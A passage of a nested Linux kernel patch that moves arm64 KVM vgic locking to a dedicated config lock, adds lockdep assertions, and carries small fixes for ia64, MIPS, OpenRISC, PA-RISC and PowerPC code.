+  * The function is generally called when nr_spis has been explicitly set
+  * by the guest through the KVM DEVICE API. If not nr_spis is set to 256.
+  * vgic_initialized() returns true when this function has succeeded.
+- * Must be called with kvm->lock held!
+  */
+ int vgic_init(struct kvm *kvm)
+ {
+@@ -259,6 +266,8 @@ int vgic_init(struct kvm *kvm)
+ 	int ret = 0, i;
+ 	unsigned long idx;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (vgic_initialized(kvm))
+ 		return 0;
+ 
+@@ -373,12 +382,13 @@ void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
+ 	vgic_cpu->rd_iodev.base_addr = VGIC_ADDR_UNDEF;
+ }
+ 
+-/* To be called with kvm->lock held */
+ static void __kvm_vgic_destroy(struct kvm *kvm)
+ {
+ 	struct kvm_vcpu *vcpu;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	vgic_debug_destroy(kvm);
+ 
+ 	kvm_for_each_vcpu(i, vcpu, kvm)
+@@ -389,9 +399,9 @@ static void __kvm_vgic_destroy(struct kvm *kvm)
+ 
+ void kvm_vgic_destroy(struct kvm *kvm)
+ {
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	__kvm_vgic_destroy(kvm);
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ }
+ 
+ /**
+@@ -414,9 +424,9 @@ int vgic_lazy_init(struct kvm *kvm)
+ 		if (kvm->arch.vgic.vgic_model != KVM_DEV_TYPE_ARM_VGIC_V2)
+ 			return -EBUSY;
+ 
+-		mutex_lock(&kvm->lock);
++		mutex_lock(&kvm->arch.config_lock);
+ 		ret = vgic_init(kvm);
+-		mutex_unlock(&kvm->lock);
++		mutex_unlock(&kvm->arch.config_lock);
+ 	}
+ 
+ 	return ret;
+@@ -441,7 +451,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	if (likely(vgic_ready(kvm)))
+ 		return 0;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	if (vgic_ready(kvm))
+ 		goto out;
+ 
+@@ -459,7 +469,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 		dist->ready = true;
+ 
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index 2642e9ce28199..750e51e3779a3 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -1958,6 +1958,16 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 	mutex_init(&its->its_lock);
+ 	mutex_init(&its->cmd_lock);
+ 
++	/* Yep, even more trickery for lock ordering... */
++#ifdef CONFIG_LOCKDEP
++	mutex_lock(&dev->kvm->arch.config_lock);
++	mutex_lock(&its->cmd_lock);
++	mutex_lock(&its->its_lock);
++	mutex_unlock(&its->its_lock);
++	mutex_unlock(&its->cmd_lock);
++	mutex_unlock(&dev->kvm->arch.config_lock);
++#endif
++
+ 	its->vgic_its_base = VGIC_ADDR_UNDEF;
+ 
+ 	INIT_LIST_HEAD(&its->device_list);
+@@ -2045,6 +2055,13 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
++	}
++
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	if (IS_VGIC_ADDR_UNDEF(its->vgic_its_base)) {
+ 		ret = -ENXIO;
+ 		goto out;
+@@ -2058,11 +2075,6 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 		goto out;
+ 	}
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
+-		ret = -EBUSY;
+-		goto out;
+-	}
+-
+ 	addr = its->vgic_its_base + offset;
+ 
+ 	len = region->access_flags & VGIC_ACCESS_64bit ? 8 : 4;
+@@ -2076,8 +2088,9 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 	} else {
+ 		*reg = region->its_read(dev->kvm, its, addr, len);
+ 	}
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 	return ret;
+ }
+@@ -2749,14 +2762,15 @@ static int vgic_its_ctrl(struct kvm *kvm, struct vgic_its *its, u64 attr)
+ 		return 0;
+ 
+ 	mutex_lock(&kvm->lock);
+-	mutex_lock(&its->its_lock);
+ 
+ 	if (!lock_all_vcpus(kvm)) {
+-		mutex_unlock(&its->its_lock);
+ 		mutex_unlock(&kvm->lock);
+ 		return -EBUSY;
+ 	}
+ 
++	mutex_lock(&kvm->arch.config_lock);
++	mutex_lock(&its->its_lock);
++
+ 	switch (attr) {
+ 	case KVM_DEV_ARM_ITS_CTRL_RESET:
+ 		vgic_its_reset(kvm, its);
+@@ -2769,8 +2783,9 @@ static int vgic_its_ctrl(struct kvm *kvm, struct vgic_its *its, u64 attr)
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(kvm);
+ 	mutex_unlock(&its->its_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++	unlock_all_vcpus(kvm);
+ 	mutex_unlock(&kvm->lock);
+ 	return ret;
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-kvm-device.c b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+index edeac2380591f..07e727023deb7 100644
+--- a/arch/arm64/kvm/vgic/vgic-kvm-device.c
++++ b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+@@ -46,7 +46,7 @@ int kvm_set_legacy_vgic_v2_addr(struct kvm *kvm, struct kvm_arm_device_addr *dev
+ 	struct vgic_dist *vgic = &kvm->arch.vgic;
+ 	int r;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	switch (FIELD_GET(KVM_ARM_DEVICE_TYPE_MASK, dev_addr->id)) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -68,7 +68,7 @@ int kvm_set_legacy_vgic_v2_addr(struct kvm *kvm, struct kvm_arm_device_addr *dev
+ 		r = -ENODEV;
+ 	}
+ 
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	return r;
+ }
+@@ -102,7 +102,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 		if (get_user(addr, uaddr))
+ 			return -EFAULT;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	switch (attr->attr) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -191,7 +191,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 	}
+ 
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	if (!r && !write)
+ 		r =  put_user(addr, uaddr);
+@@ -227,7 +227,7 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 		    (val & 31))
+ 			return -EINVAL;
+ 
+-		mutex_lock(&dev->kvm->lock);
++		mutex_lock(&dev->kvm->arch.config_lock);
+ 
+ 		if (vgic_ready(dev->kvm) || dev->kvm->arch.vgic.nr_spis)
+ 			ret = -EBUSY;
+@@ -235,16 +235,16 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 			dev->kvm->arch.vgic.nr_spis =
+ 				val - VGIC_NR_PRIVATE_IRQS;
+ 
+-		mutex_unlock(&dev->kvm->lock);
++		mutex_unlock(&dev->kvm->arch.config_lock);
+ 
+ 		return ret;
+ 	}
+ 	case KVM_DEV_ARM_VGIC_GRP_CTRL: {
+ 		switch (attr->attr) {
+ 		case KVM_DEV_ARM_VGIC_CTRL_INIT:
+-			mutex_lock(&dev->kvm->lock);
++			mutex_lock(&dev->kvm->arch.config_lock);
+ 			r = vgic_init(dev->kvm);
+-			mutex_unlock(&dev->kvm->lock);
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			return r;
+ 		case KVM_DEV_ARM_VGIC_SAVE_PENDING_TABLES:
+ 			/*
+@@ -260,7 +260,10 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 				mutex_unlock(&dev->kvm->lock);
+ 				return -EBUSY;
+ 			}
++
++			mutex_lock(&dev->kvm->arch.config_lock);
+ 			r = vgic_v3_save_pending_tables(dev->kvm);
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			unlock_all_vcpus(dev->kvm);
+ 			mutex_unlock(&dev->kvm->lock);
+ 			return r;
+@@ -411,15 +414,17 @@ static int vgic_v2_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
++	}
++
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	ret = vgic_init(dev->kvm);
+ 	if (ret)
+ 		goto out;
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
+-		ret = -EBUSY;
+-		goto out;
+-	}
+-
+ 	switch (attr->group) {
+ 	case KVM_DEV_ARM_VGIC_GRP_CPU_REGS:
+ 		ret = vgic_v2_cpuif_uaccess(vcpu, is_write, addr, &val);
+@@ -432,8 +437,9 @@ static int vgic_v2_attr_regs_access(struct kvm_device *dev,
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 
+ 	if (!ret && !is_write)
+@@ -569,12 +575,14 @@ static int vgic_v3_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
+-	if (unlikely(!vgic_initialized(dev->kvm))) {
+-		ret = -EBUSY;
+-		goto out;
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
+ 	}
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
++	mutex_lock(&dev->kvm->arch.config_lock);
++
++	if (unlikely(!vgic_initialized(dev->kvm))) {
+ 		ret = -EBUSY;
+ 		goto out;
+ 	}
+@@ -609,8 +617,9 @@ static int vgic_v3_attr_regs_access(struct kvm_device *dev,
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 
+ 	if (!ret && uaccess && !is_write) {
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 91201f7430339..472b18ac92a24 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -111,7 +111,7 @@ static void vgic_mmio_write_v3_misc(struct kvm_vcpu *vcpu,
+ 	case GICD_CTLR: {
+ 		bool was_enabled, is_hwsgi;
+ 
+-		mutex_lock(&vcpu->kvm->lock);
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 
+ 		was_enabled = dist->enabled;
+ 		is_hwsgi = dist->nassgireq;
+@@ -139,7 +139,7 @@ static void vgic_mmio_write_v3_misc(struct kvm_vcpu *vcpu,
+ 		else if (!was_enabled && dist->enabled)
+ 			vgic_kick_vcpus(vcpu->kvm);
+ 
+-		mutex_unlock(&vcpu->kvm->lock);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 		break;
+ 	}
+ 	case GICD_TYPER:
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio.c b/arch/arm64/kvm/vgic/vgic-mmio.c
+index b32d434c1d4a4..a95f99b93dd68 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio.c
+@@ -527,13 +527,13 @@ unsigned long vgic_mmio_read_active(struct kvm_vcpu *vcpu,
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 	u32 val;
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	val = __vgic_mmio_read_active(vcpu, addr, len);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 
+ 	return val;
+ }
+@@ -622,13 +622,13 @@ void vgic_mmio_write_cactive(struct kvm_vcpu *vcpu,
+ {
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	__vgic_mmio_write_cactive(vcpu, addr, len, val);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ }
+ 
+ int vgic_mmio_uaccess_write_cactive(struct kvm_vcpu *vcpu,
+@@ -659,13 +659,13 @@ void vgic_mmio_write_sactive(struct kvm_vcpu *vcpu,
+ {
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	__vgic_mmio_write_sactive(vcpu, addr, len, val);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ }
+ 
+ int vgic_mmio_uaccess_write_sactive(struct kvm_vcpu *vcpu,
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index a413718be92b8..3bb0034780605 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -232,9 +232,8 @@ int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq)
+  * @kvm:	Pointer to the VM being initialized
+  *
+  * We may be called each time a vITS is created, or when the
+- * vgic is initialized. This relies on kvm->lock to be
+- * held. In both cases, the number of vcpus should now be
+- * fixed.
++ * vgic is initialized. In both cases, the number of vcpus
++ * should now be fixed.
+  */
+ int vgic_v4_init(struct kvm *kvm)
+ {
+@@ -243,6 +242,8 @@ int vgic_v4_init(struct kvm *kvm)
+ 	int nr_vcpus, ret;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!kvm_vgic_global_state.has_gicv4)
+ 		return 0; /* Nothing to see here... move along. */
+ 
+@@ -309,14 +310,14 @@ int vgic_v4_init(struct kvm *kvm)
+ /**
+  * vgic_v4_teardown - Free the GICv4 data structures
+  * @kvm:	Pointer to the VM being destroyed
+- *
+- * Relies on kvm->lock to be held.
+  */
+ void vgic_v4_teardown(struct kvm *kvm)
+ {
+ 	struct its_vm *its_vm = &kvm->arch.vgic.its_vm;
+ 	int i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!its_vm->vpes)
+ 		return;
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic.c b/arch/arm64/kvm/vgic/vgic.c
+index d97e6080b4217..0a005da83ae64 100644
+--- a/arch/arm64/kvm/vgic/vgic.c
++++ b/arch/arm64/kvm/vgic/vgic.c
+@@ -24,11 +24,13 @@ struct vgic_global kvm_vgic_global_state __ro_after_init = {
+ /*
+  * Locking order is always:
+  * kvm->lock (mutex)
+- *   its->cmd_lock (mutex)
+- *     its->its_lock (mutex)
+- *       vgic_cpu->ap_list_lock		must be taken with IRQs disabled
+- *         kvm->lpi_list_lock		must be taken with IRQs disabled
+- *           vgic_irq->irq_lock		must be taken with IRQs disabled
++ *   vcpu->mutex (mutex)
++ *     kvm->arch.config_lock (mutex)
++ *       its->cmd_lock (mutex)
++ *         its->its_lock (mutex)
++ *           vgic_cpu->ap_list_lock		must be taken with IRQs disabled
++ *             kvm->lpi_list_lock		must be taken with IRQs disabled
++ *               vgic_irq->irq_lock		must be taken with IRQs disabled
+  *
+  * As the ap_list_lock might be taken from the timer interrupt handler,
+  * we have to disable IRQs before taking this lock and everything lower
+diff --git a/arch/ia64/kernel/salinfo.c b/arch/ia64/kernel/salinfo.c
+index bd3ba276e69c3..03b632c568995 100644
+--- a/arch/ia64/kernel/salinfo.c
++++ b/arch/ia64/kernel/salinfo.c
+@@ -581,7 +581,7 @@ static int salinfo_cpu_pre_down(unsigned int cpu)
+  * 'data' contains an integer that corresponds to the feature we're
+  * testing
+  */
+-static int proc_salinfo_show(struct seq_file *m, void *v)
++static int __maybe_unused proc_salinfo_show(struct seq_file *m, void *v)
+ {
+ 	unsigned long data = (unsigned long)v;
+ 	seq_puts(m, (sal_platform_features & data) ? "1\n" : "0\n");
+diff --git a/arch/ia64/mm/contig.c b/arch/ia64/mm/contig.c
+index 24901d8093015..1e9eaa107eb73 100644
+--- a/arch/ia64/mm/contig.c
++++ b/arch/ia64/mm/contig.c
+@@ -77,7 +77,7 @@ skip:
+ 	return __per_cpu_start + __per_cpu_offset[smp_processor_id()];
+ }
+ 
+-static inline void
++static inline __init void
+ alloc_per_cpu_data(void)
+ {
+ 	size_t size = PERCPU_PAGE_SIZE * num_possible_cpus();
+diff --git a/arch/ia64/mm/hugetlbpage.c b/arch/ia64/mm/hugetlbpage.c
+index 380d2f3966c98..9e8960e499622 100644
+--- a/arch/ia64/mm/hugetlbpage.c
++++ b/arch/ia64/mm/hugetlbpage.c
+@@ -58,7 +58,7 @@ huge_pte_offset (struct mm_struct *mm, unsigned long addr, unsigned long sz)
+ 
+ 	pgd = pgd_offset(mm, taddr);
+ 	if (pgd_present(*pgd)) {
+-		p4d = p4d_offset(pgd, addr);
++		p4d = p4d_offset(pgd, taddr);
+ 		if (p4d_present(*p4d)) {
+ 			pud = pud_offset(p4d, taddr);
+ 			if (pud_present(*pud)) {
+diff --git a/arch/mips/fw/lib/cmdline.c b/arch/mips/fw/lib/cmdline.c
+index f24cbb4a39b50..892765b742bbc 100644
+--- a/arch/mips/fw/lib/cmdline.c
++++ b/arch/mips/fw/lib/cmdline.c
+@@ -53,7 +53,7 @@ char *fw_getenv(char *envname)
+ {
+ 	char *result = NULL;
+ 
+-	if (_fw_envp != NULL) {
++	if (_fw_envp != NULL && fw_envp(0) != NULL) {
+ 		/*
+ 		 * Return a pointer to the given environment variable.
+ 		 * YAMON uses "name", "value" pairs, while U-Boot uses
+diff --git a/arch/openrisc/kernel/entry.S b/arch/openrisc/kernel/entry.S
+index 54a87bba35caa..a130c4dac48d3 100644
+--- a/arch/openrisc/kernel/entry.S
++++ b/arch/openrisc/kernel/entry.S
+@@ -173,7 +173,6 @@ handler:							;\
+ 	l.sw    PT_GPR28(r1),r28					;\
+ 	l.sw    PT_GPR29(r1),r29					;\
+ 	/* r30 already save */					;\
+-/*        l.sw    PT_GPR30(r1),r30*/					;\
+ 	l.sw    PT_GPR31(r1),r31					;\
+ 	TRACE_IRQS_OFF_ENTRY						;\
+ 	/* Store -1 in orig_gpr11 for non-syscall exceptions */	;\
+@@ -211,9 +210,8 @@ handler:							;\
+ 	l.sw    PT_GPR27(r1),r27					;\
+ 	l.sw    PT_GPR28(r1),r28					;\
+ 	l.sw    PT_GPR29(r1),r29					;\
+-	/* r31 already saved */					;\
+-	l.sw    PT_GPR30(r1),r30					;\
+-/*        l.sw    PT_GPR31(r1),r31	*/				;\
++	/* r30 already saved */						;\
++	l.sw    PT_GPR31(r1),r31					;\
+ 	/* Store -1 in orig_gpr11 for non-syscall exceptions */	;\
+ 	l.addi	r30,r0,-1					;\
+ 	l.sw	PT_ORIG_GPR11(r1),r30				;\
+diff --git a/arch/parisc/kernel/pacache.S b/arch/parisc/kernel/pacache.S
+index 9a0018f1f42cb..541370d145594 100644
+--- a/arch/parisc/kernel/pacache.S
++++ b/arch/parisc/kernel/pacache.S
+@@ -889,6 +889,7 @@ ENDPROC_CFI(flush_icache_page_asm)
+ ENTRY_CFI(flush_kernel_dcache_page_asm)
+ 88:	ldil		L%dcache_stride, %r1
+ 	ldw		R%dcache_stride(%r1), %r23
++	depi_safe	0, 31,PAGE_SHIFT, %r26	/* Clear any offset bits */
+ 
+ #ifdef CONFIG_64BIT
+ 	depdi,z		1, 63-PAGE_SHIFT,1, %r25
+@@ -925,6 +926,7 @@ ENDPROC_CFI(flush_kernel_dcache_page_asm)
+ ENTRY_CFI(purge_kernel_dcache_page_asm)
+ 88:	ldil		L%dcache_stride, %r1
+ 	ldw		R%dcache_stride(%r1), %r23
++	depi_safe	0, 31,PAGE_SHIFT, %r26	/* Clear any offset bits */
+ 
+ #ifdef CONFIG_64BIT
+ 	depdi,z		1, 63-PAGE_SHIFT,1, %r25
+diff --git a/arch/parisc/kernel/real2.S b/arch/parisc/kernel/real2.S
+index 4dc12c4c09809..509d18b8e0e65 100644
+--- a/arch/parisc/kernel/real2.S
++++ b/arch/parisc/kernel/real2.S
+@@ -235,9 +235,6 @@ ENTRY_CFI(real64_call_asm)
+ 	/* save fn */
+ 	copy	%arg2, %r31
+ 
+-	/* set up the new ap */
+-	ldo	64(%arg1), %r29
+-
+ 	/* load up the arg registers from the saved arg area */
+ 	/* 32-bit calling convention passes first 4 args in registers */
+ 	ldd	0*REG_SZ(%arg1), %arg0		/* note overwriting arg0 */
+@@ -249,7 +246,9 @@ ENTRY_CFI(real64_call_asm)
+ 	ldd	7*REG_SZ(%arg1), %r19
+ 	ldd	1*REG_SZ(%arg1), %arg1		/* do this one last! */
+ 
++	/* set up real-mode stack and real-mode ap */
+ 	tophys_r1 %sp
++	ldo	-16(%sp), %r29			/* Reference param save area */
+ 
+ 	b,l	rfi_virt2real,%r2
+ 	nop
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index 295f76df13b55..13fad4f0a6d8f 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -34,6 +34,8 @@ endif
+ 
+ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 -fno-strict-aliasing -O2 -msoft-float -mno-altivec -mno-vsx \
++		 $(call cc-option,-mno-prefixed) $(call cc-option,-mno-pcrel) \
++		 $(call cc-option,-mno-mma) \
+ 		 $(call cc-option,-mno-spe) $(call cc-option,-mspe=no) \
+ 		 -pipe -fomit-frame-pointer -fno-builtin -fPIC -nostdinc \
+ 		 $(LINUXINCLUDE)
+diff --git a/arch/powerpc/include/asm/reg.h b/arch/powerpc/include/asm/reg.h
+index 1e8b2e04e626a..8fda87af2fa5e 100644
+--- a/arch/powerpc/include/asm/reg.h
++++ b/arch/powerpc/include/asm/reg.h
+@@ -1310,6 +1310,11 @@
+ #define PVR_VER_E500MC	0x8023
+ #define PVR_VER_E5500	0x8024
+ #define PVR_VER_E6500	0x8040
++#define PVR_VER_7450	0x8000
++#define PVR_VER_7455	0x8001
++#define PVR_VER_7447	0x8002
++#define PVR_VER_7447A	0x8003
++#define PVR_VER_7448	0x8004
+ 
+ /*
+  * For the 8xx processors, all of them report the same PVR family for
+diff --git a/arch/powerpc/kernel/rtas.c b/arch/powerpc/kernel/rtas.c
+index deded51a79784..333a239a30d62 100644
+--- a/arch/powerpc/kernel/rtas.c
++++ b/arch/powerpc/kernel/rtas.c
+@@ -425,7 +425,7 @@ static char *__fetch_rtas_last_error(char *altbuf)
+ 				buf = kmalloc(RTAS_ERROR_LOG_MAX, GFP_ATOMIC);
+ 		}
+ 		if (buf)
+-			memcpy(buf, rtas_err_buf, RTAS_ERROR_LOG_MAX);
++			memmove(buf, rtas_err_buf, RTAS_ERROR_LOG_MAX);
+ 	}
+ 
+ 	return buf;
+diff --git a/arch/powerpc/perf/mpc7450-pmu.c b/arch/powerpc/perf/mpc7450-pmu.c
+index 552d51a925d37..db451b9aac35e 100644
+--- a/arch/powerpc/perf/mpc7450-pmu.c
++++ b/arch/powerpc/perf/mpc7450-pmu.c
+@@ -417,9 +417,9 @@ struct power_pmu mpc7450_pmu = {
+ 
+ static int __init init_mpc7450_pmu(void)
+ {
+-	unsigned int pvr = mfspr(SPRN_PVR);
+-
+-	if (PVR_VER(pvr) != PVR_7450)
++	if (!pvr_version_is(PVR_VER_7450) && !pvr_version_is(PVR_VER_7455) &&
++	    !pvr_version_is(PVR_VER_7447) && !pvr_version_is(PVR_VER_7447A) &&
++	    !pvr_version_is(PVR_VER_7448))
+ 		return -ENODEV;
+ 
+ 	return register_power_pmu(&mpc7450_pmu);
+diff --git a/arch/powerpc/platforms/512x/clock-commonclk.c b/arch/powerpc/platforms/512x/clock-commonclk.c
+index 42abeba4f6983..079cb3627eacd 100644
+--- a/arch/powerpc/platforms/512x/clock-commonclk.c
++++ b/arch/powerpc/platforms/512x/clock-commonclk.c
+@@ -986,7 +986,7 @@ static void __init mpc5121_clk_provide_migration_support(void)
+ 
+ #define NODE_PREP do { \
+ 	of_address_to_resource(np, 0, &res); \
+-	snprintf(devname, sizeof(devname), "%08x.%s", res.start, np->name); \
++	snprintf(devname, sizeof(devname), "%pa.%s", &res.start, np->name); \
+ } while (0)
+ 
+ #define NODE_CHK(clkname, clkitem, regnode, regflag) do { \
+diff --git a/arch/powerpc/platforms/embedded6xx/flipper-pic.c b/arch/powerpc/platforms/embedded6xx/flipper-pic.c
+index 609bda2ad5dd2..4d9200bdba78c 100644
+--- a/arch/powerpc/platforms/embedded6xx/flipper-pic.c
++++ b/arch/powerpc/platforms/embedded6xx/flipper-pic.c
+@@ -145,7 +145,7 @@ static struct irq_domain * __init flipper_pic_init(struct device_node *np)
+ 	}
+ 	io_base = ioremap(res.start, resource_size(&res));
+ 
+-	pr_info("controller at 0x%08x mapped to 0x%p\n", res.start, io_base);
++	pr_info("controller at 0x%pa mapped to 0x%p\n", &res.start, io_base);
+ 
+ 	__flipper_quiesce(io_base);
+ 
+diff --git a/arch/powerpc/platforms/embedded6xx/hlwd-pic.c b/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
+index 380b4285cce47..4d2d92de30afd 100644
+--- a/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
++++ b/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
+@@ -171,7 +171,7 @@ static struct irq_domain *__init hlwd_pic_init(struct device_node *np)
+ 		return NULL;
+ 	}
+ 
+-	pr_info("controller at 0x%08x mapped to 0x%p\n", res.start, io_base);
++	pr_info("controller at 0x%pa mapped to 0x%p\n", &res.start, io_base);
+ 
+ 	__hlwd_quiesce(io_base);
+ 
+diff --git a/arch/powerpc/platforms/embedded6xx/wii.c b/arch/powerpc/platforms/embedded6xx/wii.c
+index f4e654a9d4ff6..219659f2ede06 100644
+--- a/arch/powerpc/platforms/embedded6xx/wii.c
++++ b/arch/powerpc/platforms/embedded6xx/wii.c
+@@ -74,8 +74,8 @@ static void __iomem *__init wii_ioremap_hw_regs(char *name, char *compatible)
+ 
+ 	hw_regs = ioremap(res.start, resource_size(&res));
+ 	if (hw_regs) {
+-		pr_info("%s at 0x%08x mapped to 0x%p\n", name,
+-			res.start, hw_regs);
++		pr_info("%s at 0x%pa mapped to 0x%p\n", name,
++			&res.start, hw_regs);
+ 	}
+ 
+ out_put:
+diff --git a/arch/powerpc/sysdev/tsi108_pci.c b/arch/powerpc/sysdev/tsi108_pci.c
+index 5af4c35ff5842..0e42f7bad7db1 100644
+--- a/arch/powerpc/sysdev/tsi108_pci.c
++++ b/arch/powerpc/sysdev/tsi108_pci.c
+@@ -217,9 +217,8 @@ int __init tsi108_setup_pci(struct device_node *dev, u32 cfg_phys, int primary)
+ 
+ 	(hose)->ops = &tsi108_direct_pci_ops;
+ 
+-	printk(KERN_INFO "Found tsi108 PCI host bridge at 0x%08x. "
+-	       "Firmware bus number: %d->%d\n",
+-	       rsrc.start, hose->first_busno, hose->last_busno);
++	pr_info("Found tsi108 PCI host bridge at 0x%pa. Firmware bus number: %d->%d\n",
++		&rsrc.start, hose->first_busno, hose->last_busno);
+ 
+ 	/* Interpret the "ranges" property */
+ 	/* This also maps the I/O region and sets isa_io/mem_base */
+diff --git a/arch/riscv/include/asm/sbi.h b/arch/riscv/include/asm/sbi.h
+index 4ca7fbacff424..8cb7c579aa21d 100644
+--- a/arch/riscv/include/asm/sbi.h
++++ b/arch/riscv/include/asm/sbi.h
+@@ -293,7 +293,7 @@ int sbi_remote_hfence_vvma_asid(const struct cpumask *cpu_mask,
+ 				unsigned long start,
+ 				unsigned long size,
+ 				unsigned long asid);
+-int sbi_probe_extension(int ext);
++long sbi_probe_extension(int ext);
+ 
+ /* Check if current SBI specification version is 0.1 or not */
+ static inline int sbi_spec_is_0_1(void)
+diff --git a/arch/riscv/kernel/cpu_ops.c b/arch/riscv/kernel/cpu_ops.c
+index 8275f237a59df..eb479a88a954e 100644
+--- a/arch/riscv/kernel/cpu_ops.c
++++ b/arch/riscv/kernel/cpu_ops.c
